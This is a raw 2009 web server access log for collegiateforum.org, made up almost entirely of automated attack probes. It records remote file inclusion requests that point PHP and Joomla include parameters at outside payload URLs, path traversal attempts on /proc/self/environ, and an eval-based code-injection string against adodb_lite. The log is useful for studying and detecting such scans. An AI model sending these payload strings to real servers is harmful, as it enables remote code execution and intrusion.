61.67.196.130 - - [28/Jun/2009:17:43:28 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:31 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:32 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:49 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:43:55 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:17:45:21 -0700] "GET /logs/access_090105.log%20%20//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:17:45:21 -0700] "GET /?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:17:45:21 -0700] "GET /logs//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:17:45:36 -0700] "GET /logs/access_081208.log%20%20//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:47:58 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:47:58 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:48:15 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
61.67.196.130 - - [28/Jun/2009:17:48:15 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:51:06 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:51:06 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:51:17 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:51:18 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:51:23 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.251.168.157 - - [28/Jun/2009:17:51:23 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:54:56 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:54:57 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
216.45.56.47 - - [28/Jun/2009:17:56:45 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.45.56.47 - - [28/Jun/2009:17:56:45 -0700] "GET /logs/access_090330.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.45.56.47 - - [28/Jun/2009:17:56:45 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:17:57:10 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:17:57:10 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:17:57:10 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:17:57:40 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:17:57:40 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:17:57:43 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:58:00 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:17:59:14 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:17:59:14 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:17:59:54 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:18:00:26 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:18:00:27 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:18:00:30 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:18:00:34 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:18:00:44 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
65.55.106.190 - - [28/Jun/2009:18:03:24 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:18:04:30 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:18:04:30 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:18:04:43 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.179.130 - - [28/Jun/2009:18:04:43 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:18:05:09 -0700] "GET /logs/access_090330.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:18:05:09 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:18:05:10 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:05:29 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:05:30 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:05:32 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:05:33 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:09:31 -0700] "GET /core/themes.php?GLOBALS[theme_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:09:31 -0700] "GET /logs//core/themes.php?GLOBALS[theme_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:09:31 -0700] "GET /logs//core/themes.php?GLOBALS[theme_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:09:31 -0700] "GET /core/themes.php?GLOBALS[theme_path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:46 -0700] "GET /logs/access.log//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:46 -0700] "GET /?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 934 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:46 -0700] "GET /logs//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 5090 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 934 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 5090 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 934 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:10:47 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5090 "-" "XXXXXX" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:18:13:13 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:18:13:13 -0700] "GET /logs/access.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
194.63.248.44 - - [28/Jun/2009:18:13:13 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:18:16:45 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:18:17:02 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:18:19:34 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
150.214.108.8 - - [28/Jun/2009:18:19:38 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
216.45.56.47 - - [28/Jun/2009:18:52:26 -0700] "GET /logs/access_090330.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.45.56.47 - - [28/Jun/2009:18:52:26 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.45.56.47 - - [28/Jun/2009:18:52:26 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
204.62.54.203 - - [28/Jun/2009:18:52:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.collegiateforum.org"
204.62.54.203 - - [28/Jun/2009:18:52:58 -0700] "GET /logs/access_081215.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:18:53:11 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:18:53:11 -0700] "GET /logs/access_090330.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.165.34.49 - - [28/Jun/2009:18:53:11 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:53:11 -0700] "GET //file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:53:11 -0700] "GET /logs///file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:53:12 -0700] "GET /logs///file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
91.195.124.16 - - [28/Jun/2009:18:53:12 -0700] "GET //file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.collegiateforum.org"
131.203.76.246 - - [28/Jun/2009:18:57:39 -0700] "GET /logs/access_090330.log//faqsupport/samplefaqsupport.php?path[docroot]=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
131.203.76.246 - - [28/Jun/2009:18:57:39 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
131.203.76.246 - - [28/Jun/2009:18:57:39 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
66.46.177.182 - - [28/Jun/2009:19:01:03 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
66.46.177.182 - - [28/Jun/2009:19:01:03 -0700] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
66.46.177.182 - - [28/Jun/2009:19:01:03 -0700] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.51.241.6 - - [28/Jun/2009:19:02:30 -0700] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.51.241.6 - - [28/Jun/2009:19:02:30 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.51.241.6 - - [28/Jun/2009:19:02:30 -0700] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.51.241.6 - - [28/Jun/2009:19:02:33 -0700] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.51.241.6 - - [28/Jun/2009:19:02:33 -0700] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.51.241.6 - - [28/Jun/2009:19:02:33 -0700] "GET /logs/access.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
222.122.6.62 - - [28/Jun/2009:19:03:03 -0700] "GET /logs/access_090330.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
222.122.6.62 - - [28/Jun/2009:19:03:03 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
222.122.6.62 - - [28/Jun/2009:19:03:03 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.51.241.6 - - [28/Jun/2009:19:06:07 -0700] "GET /logs/access.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [28/Jun/2009:19:23:02 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "collegiateforum.org"
200.93.147.154 - - [28/Jun/2009:19:23:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "collegiateforum.org"
66.46.177.182 - - [28/Jun/2009:19:23:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
66.46.177.182 - - [28/Jun/2009:19:23:05 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
66.46.177.182 - - [28/Jun/2009:19:23:05 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
200.93.147.154 - - [28/Jun/2009:19:23:07 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "collegiateforum.org"
201.232.54.48 - - [28/Jun/2009:19:24:13 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
201.232.54.48 - - [28/Jun/2009:19:24:13 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
201.232.54.48 - - [28/Jun/2009:19:24:13 -0700] "GET /logs/access_081208.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
